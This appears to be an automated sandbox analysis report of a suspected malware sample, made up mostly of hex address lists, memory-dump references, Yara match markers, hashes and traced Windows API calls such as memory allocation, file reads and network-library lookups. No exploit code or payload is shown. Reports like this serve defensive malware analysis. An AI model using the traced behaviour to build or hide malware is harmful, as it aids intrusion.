                                                                                0x00a78010
                                                                                0x00a7801f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00a78025
                                                                                0x00a36b2f
                                                                                0x00a36b2f
                                                                                0x00a36b32
                                                                                0x00000000
                                                                                0x00a36b32
                                                                                0x00a36b26
                                                                                0x00a78030
                                                                                0x00a7803a
                                                                                0x00a7803c
                                                                                0x00a7803c
                                                                                0x00a78032
                                                                                0x00a78032
                                                                                0x00a78032
                                                                                0x00a7803f
                                                                                0x00a36b2c
                                                                                0x00a36b2c
                                                                                0x00a36b2c
                                                                                0x00000000
                                                                                0x00a36b26
                                                                                0x00a36ad0
                                                                                0x00a36ad6
                                                                                0x00a36ade
                                                                                0x00a36ae0
                                                                                0x00a36ae0
                                                                                0x00a36ae5
                                                                                0x00a77f53
                                                                                0x00a36aeb
                                                                                0x00a36aeb
                                                                                0x00a36aeb
                                                                                0x00a36af3
                                                                                0x00a77f5e
                                                                                0x00a77f61
                                                                                0x00a77f68
                                                                                0x00a77f69
                                                                                0x00a77f6b
                                                                                0x00a77f70
                                                                                0x00a77f71
                                                                                0x00a77f76
                                                                                0x00a77f77
                                                                                0x00a77f7c
                                                                                0x00a77f86
                                                                                0x00a77f88
                                                                                0x00a77f8d
                                                                                0x00a77f92
                                                                                0x00a77f97
                                                                                0x00a77f98
                                                                                0x00a77f99
                                                                                0x00a77f9a
                                                                                0x00a77f9f
                                                                                0x00a77fa0
                                                                                0x00a77fa5
                                                                                0x00a77faa
                                                                                0x00a77faa
                                                                                0x00a77faf
                                                                                0x00a77fdc
                                                                                0x00a77fdf
                                                                                0x00000000
                                                                                0x00a77fb1
                                                                                0x00a77fb1
                                                                                0x00a77fb3
                                                                                0x00a77fb8
                                                                                0x00a77fd4
                                                                                0x00a77fd4
                                                                                0x00000000
                                                                                0x00a77fd4
                                                                                0x00a77fba
                                                                                0x00a77fbc
                                                                                0x00a77fc2
                                                                                0x00a77fc4
                                                                                0x00a77fc4
                                                                                0x00a77fc7
                                                                                0x00a77fcb
                                                                                0x00a77fcc
                                                                                0x00a77fd1
                                                                                0x00000000
                                                                                0x00a77fd1
                                                                                0x00a36b04
                                                                                0x00a36b04
                                                                                0x00a36b0b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00a36b11
                                                                                0x00000000
                                                                                0x00a36b11
                                                                                0x00a36af3

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86f70524154c4e0574ed6cae41c63e578bcfcf9be931135ecc3def053d98e4b7
                                                                                • Instruction ID: 29730a296b8c86ab95f0ccf352e068bcd99d0e91b6d5d005297e5478c5c4a243
                                                                                • Opcode Fuzzy Hash: 86f70524154c4e0574ed6cae41c63e578bcfcf9be931135ecc3def053d98e4b7
                                                                                • Instruction Fuzzy Hash: 75815775E002199FDB24CF98C981BEEBBB5EF48340F14C069E949AB281D775AD05CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                				void* _t7;
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t13;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                
                                                                                				_t13 = __edx;
                                                                                				_push(_a4);
                                                                                				_t14 =  *[fs:0x18];
                                                                                				_t15 = _t12;
                                                                                				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                				_push(_t13);
                                                                                				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                				_t9 =  *_t15;
                                                                                				if(_t9 == 0xffffffff) {
                                                                                					_t10 = 0;
                                                                                				} else {
                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                				}
                                                                                				_push(_t10);
                                                                                				_push(_t15);
                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                			}










                                                                                0x00a9fdda
                                                                                0x00a9fde2
                                                                                0x00a9fde5
                                                                                0x00a9fdec
                                                                                0x00a9fdfa
                                                                                0x00a9fdff
                                                                                0x00a9fe0a
                                                                                0x00a9fe0f
                                                                                0x00a9fe17
                                                                                0x00a9fe1e
                                                                                0x00a9fe19
                                                                                0x00a9fe19
                                                                                0x00a9fe19
                                                                                0x00a9fe20
                                                                                0x00a9fe21
                                                                                0x00a9fe22
                                                                                0x00a9fe25
                                                                                0x00a9fe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                                                                                • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00503B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00503B87,007A002E,00000000,00000060,00000000,00000000), ref: 005081FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`$8P
                                                                                • API String ID: 823142352-3636872588
                                                                                • Opcode ID: 835d702d98e6a78139b867d18569f72eeca8db575ab25c8f25acf748b4f9dde2
                                                                                • Instruction ID: 0b2c2310bc899a118bfd8fa30e56ba24b497b8b72d643f5d44aa6173c5e34021
                                                                                • Opcode Fuzzy Hash: 835d702d98e6a78139b867d18569f72eeca8db575ab25c8f25acf748b4f9dde2
                                                                                • Instruction Fuzzy Hash: 7C2113B6200109AFCB08DF98DC84DEB77ADFF8C354B158648FA5D97242CA30E851CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00503B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00503B87,007A002E,00000000,00000060,00000000,00000000), ref: 005081FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction ID: 7790d7f8349c62104df81fb3393615af9aa555e34a285839bbae5eaa5fec1822
                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction Fuzzy Hash: EBF0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL( =P,?,?,00503D20,00000000,FFFFFFFF), ref: 00508305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: =P
                                                                                • API String ID: 3535843008-3331294904
                                                                                • Opcode ID: 42a4e19755708be5b448a1cf69ad434697d2b993baadc6a237a9eafe4f69f158
                                                                                • Instruction ID: 9c9c7e711c2d26b7380033e6fafa3eb1848a8e2e329535a383972a2f5c1b7efa
                                                                                • Opcode Fuzzy Hash: 42a4e19755708be5b448a1cf69ad434697d2b993baadc6a237a9eafe4f69f158
                                                                                • Instruction Fuzzy Hash: 8AF05EB6200214ABD724EF98DC81EEB7769EF88710F148559BA4C9B241CA30E91587E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL( =P,?,?,00503D20,00000000,FFFFFFFF), ref: 00508305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: =P
                                                                                • API String ID: 3535843008-3331294904
                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction ID: d5cf50fcd03d5d1f027301f261908f048e2b794d9e216f7cbb14617180df8402
                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction Fuzzy Hash: 30D01276200214ABD710EF98CC45EE77B5CEF44750F154555BA585B282C930F90086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00503A01,?,?,?,?,00503A01,FFFFFFFF,?,B=P,?,00000000), ref: 005082A5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 678ac9fd61a0bce31e20aba1835998ab4c3516fc940bdc12fbdb0f57bc8d7e21
                                                                                • Instruction ID: f7de7a4844ab0a3121fb79737ff36ccb42fcd22edb6bf179a7a47180a2bc8e55
                                                                                • Opcode Fuzzy Hash: 678ac9fd61a0bce31e20aba1835998ab4c3516fc940bdc12fbdb0f57bc8d7e21
                                                                                • Instruction Fuzzy Hash: 26F0F9B2200104AFCB14CF99DC94DEB7BA9AF8C354F058258BA0D97281D630E811CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004F2D11,00002000,00003000,00000004), ref: 005083C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: b0bf6cf96fcd60f43a3171a5805deff9adaf08db7ad2056f639cc23d8bb77abc
                                                                                • Instruction ID: 86a2428969781c0454508b98b544c264234e789dab82e31383476f8c1f9320f1
                                                                                • Opcode Fuzzy Hash: b0bf6cf96fcd60f43a3171a5805deff9adaf08db7ad2056f639cc23d8bb77abc
                                                                                • Instruction Fuzzy Hash: 92F090B5604248AFDB14CF65DC81DEB7B68BF99304F15424DFD5897282C630E911CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00503A01,?,?,?,?,00503A01,FFFFFFFF,?,B=P,?,00000000), ref: 005082A5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction ID: 46f6c7b8642987fbc04e9af0338a05bd46eb557290719fed6c291393c1a10afb
                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction Fuzzy Hash: DAF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004F2D11,00002000,00003000,00000004), ref: 005083C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction ID: 9d4b9750bb76bf69e10a5f5db9f394f8b132a610a50be668dd1de9caa47c77bf
                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction Fuzzy Hash: 28F01CB2200208ABCB14DF89CC81EEB77ADAF88750F158148BE0897241C630F810CBE0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 113131efdb780e898d9cf056464af230c421e3ad48ae82c16b3967e7eb801fcc
                                                                                • Instruction ID: 560a2d4491da07e643dfeffe8fbe8feef7d83c42b8a91c34f3db9f823360f8f2
                                                                                • Opcode Fuzzy Hash: 113131efdb780e898d9cf056464af230c421e3ad48ae82c16b3967e7eb801fcc
                                                                                • Instruction Fuzzy Hash: 149004F5751000033505F55D07145070047D7D57D5751C033F1007550CD775DC717171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e19f37e953721989aeeb1c47c9cf8615977a00899c9e78a2ab8e297a5b45b7b5
                                                                                • Instruction ID: 7e7ed3dfb823baa39dbd0e20010e474eced7017274240bda4aba8c724a3527a0
                                                                                • Opcode Fuzzy Hash: e19f37e953721989aeeb1c47c9cf8615977a00899c9e78a2ab8e297a5b45b7b5
                                                                                • Instruction Fuzzy Hash: BF9002E164200003650571594424616400A97E0645F51C022E1005590DC669D8917165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7df030aa54e7024d6e681cac87081d46d18fbe27163ae2e5e046f01381107ca9
                                                                                • Instruction ID: b93407066e22458d3c147372c584b0735e430a3393f47584dc6d9a2dc5bb539d
                                                                                • Opcode Fuzzy Hash: 7df030aa54e7024d6e681cac87081d46d18fbe27163ae2e5e046f01381107ca9
                                                                                • Instruction Fuzzy Hash: 219002B164504842F54071594414A46001597D0749F51C012A0055694D9769DD55B6A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9ba42ca63e8772c4ab27411dc26f80e613e520653f90f76b1b78a96e59298c27
                                                                                • Instruction ID: 0e592020cb98ff5b832b12159b0d9547bee00b65e53870ffcf1d9e7a3e3631f4
                                                                                • Opcode Fuzzy Hash: 9ba42ca63e8772c4ab27411dc26f80e613e520653f90f76b1b78a96e59298c27
                                                                                • Instruction Fuzzy Hash: 949002B164100802F5807159441464A000597D1745F91C016A0016654DCB59DA5977E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 755bb94de997e5ce49a9ebb2ac94fe26ccf355ce658f5a9e0f93260889f5ebc5
                                                                                • Instruction ID: 75ac8cd5de5cb901104cd1da5ee21c345aa624b650c84ddf4cb11d69b16a3187
                                                                                • Opcode Fuzzy Hash: 755bb94de997e5ce49a9ebb2ac94fe26ccf355ce658f5a9e0f93260889f5ebc5
                                                                                • Instruction Fuzzy Hash: E79004F174100C43F500715D4414F470005D7F0745F51C017F0115754DC75DDC517571
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3a276794bc11cf64bd7129aa3d194e705ba5deb5081feb65debeb0da2d3c4510
                                                                                • Instruction ID: 273c1914f9f61336ce34cf08eed2dac0f287e45b693d757f8ac8a904a94299f8
                                                                                • Opcode Fuzzy Hash: 3a276794bc11cf64bd7129aa3d194e705ba5deb5081feb65debeb0da2d3c4510
                                                                                • Instruction Fuzzy Hash: C19002B164108802F5106159841474A000597D0745F55C412A4415658D87D9D8917161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b87988d611aab0bc6567d35c516bb05e649227d1cd0109c36e30155096cf526e
                                                                                • Instruction ID: e333c5c94e57338513060a92b073726ac3c7360d5d1ad90e13c540032f2f9135
                                                                                • Opcode Fuzzy Hash: b87988d611aab0bc6567d35c516bb05e649227d1cd0109c36e30155096cf526e
                                                                                • Instruction Fuzzy Hash: FE9002B164100402F50065995418646000597E0745F51D012A5015555EC7A9D8917171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2d39a978df01b29761101e78725cea3e8c7dec8afe0691cc455500998cded491
                                                                                • Instruction ID: 37213031359dda923dd6f98d3265d8013ba4a01950a259a08662606e34f8cd01
                                                                                • Opcode Fuzzy Hash: 2d39a978df01b29761101e78725cea3e8c7dec8afe0691cc455500998cded491
                                                                                • Instruction Fuzzy Hash: 2B9002B175114402F51061598414706000597D1645F51C412A0815558D87D9D8917162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 728d34d31e5e265cf07ec9b7cb4ae64b8f2c7a2b9e06af892053db9d6b858ace
                                                                                • Instruction ID: 7ddb1ddab141a846d401041bdf828696ef56d11b63557b8c935d4a70bc2e9b2b
                                                                                • Opcode Fuzzy Hash: 728d34d31e5e265cf07ec9b7cb4ae64b8f2c7a2b9e06af892053db9d6b858ace
                                                                                • Instruction Fuzzy Hash: 0A9002A965300002F5807159541860A000597D1646F91D416A0006558CCA59D8696361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e4914611bef308c25d36878e2ea8d2d66c9caae110ac693680ef549f6d5a8c53
                                                                                • Instruction ID: dc9e4e62f02b3fec119dad3091b4002eaffab49fe807f2b09ed21cdea8c2caa6
                                                                                • Opcode Fuzzy Hash: e4914611bef308c25d36878e2ea8d2d66c9caae110ac693680ef549f6d5a8c53
                                                                                • Instruction Fuzzy Hash: 4A9002A1682041527945B15944145074006A7E0685B91C013A1405950C866AE856E661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3ddabaae27ad60f936b32b3041f43b60f22041fde31aaeb2c12ca79a03d76cfe
                                                                                • Instruction ID: 2132425e50dcb4e940694da8719c80ce5e5e004ffedd1b59d26e5d3a1abd09ac
                                                                                • Opcode Fuzzy Hash: 3ddabaae27ad60f936b32b3041f43b60f22041fde31aaeb2c12ca79a03d76cfe
                                                                                • Instruction Fuzzy Hash: 919002B164100413F51161594514707000997D0685F91C413A0415558D979AD952B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 50e1bb177432547235d73f889ff62315f1b448c86044f6e68fbfd01db9743f82
                                                                                • Instruction ID: 275330aa171175b501d7359c31efc3ecabf4618d81f9de91755db4405e9f7342
                                                                                • Opcode Fuzzy Hash: 50e1bb177432547235d73f889ff62315f1b448c86044f6e68fbfd01db9743f82
                                                                                • Instruction Fuzzy Hash: EE9002F164100402F54071594414746000597D0745F51C012A5055554E879DDDD576A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 31d914ee344696bf579df440fe6f9af2b4f27bee3bd754f5323e899198fa0663
                                                                                • Instruction ID: 86c0a1ef55e596af94716ece2896aa39393e0bacb408f075a524e88dff18e821
                                                                                • Opcode Fuzzy Hash: 31d914ee344696bf579df440fe6f9af2b4f27bee3bd754f5323e899198fa0663
                                                                                • Instruction Fuzzy Hash: FE9002E178100442F50061594424B060005D7E1745F51C016E1055554D875DDC527166
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 0e3a6567e7ac7a24a4f3ea4863a129e1798218dd10b93da19674257a68e4643c
                                                                                • Instruction ID: 744f6c1eb376931c711cd1a2e8b841105264cba5f9f0b945c3ece95d31f91fc6
                                                                                • Opcode Fuzzy Hash: 0e3a6567e7ac7a24a4f3ea4863a129e1798218dd10b93da19674257a68e4643c
                                                                                • Instruction Fuzzy Hash: CA9002A165180042F60065694C24B07000597D0747F51C116A0145554CCA59D8616561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00506F78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                                • Instruction ID: c1b2a66b5be6e1fcbc5f8d8ee59cf78b3202255bf7aad49785ecc0df20790af5
                                                                                • Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                                                • Instruction Fuzzy Hash: 1131A1B1601705ABD715DF68D8A1FABBBB8FF88700F00841DF61A9B285D730B955CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00506F78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
